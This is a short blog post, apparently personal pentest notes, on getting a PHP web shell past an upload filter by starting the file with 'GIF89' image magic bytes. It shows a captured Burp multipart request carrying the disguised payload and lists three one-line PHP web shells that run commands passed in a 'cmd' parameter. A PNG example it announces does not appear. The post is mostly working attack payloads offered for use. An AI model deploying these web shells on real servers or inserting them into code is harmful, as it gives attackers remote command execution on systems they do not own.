uploading a shell via an IMAGE

Having "GIF89" at the start of the file means the server may interpret the file as a GIF.

Like so, capturing the file from burp.

Content-Disposition: form-data; name="fileToUpload"; filename="tux.htb"
Content-Type: image/gif

GIF89 <?php echo system($_REQUEST['cmd']); ?>

try to execute any command as "cmd" could allow code execution.

<?php echo system($_REQUEST['cmd']); ?>
<?php echo system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>

If magicbytes are configured, then the server will look at the start of the file to see whether the file
looks like an image by its proceeding characters.

The below is the start of a png file that also includes a parameter of 'cmd' used for code execution after successful upload.

No comments:

Post a Comment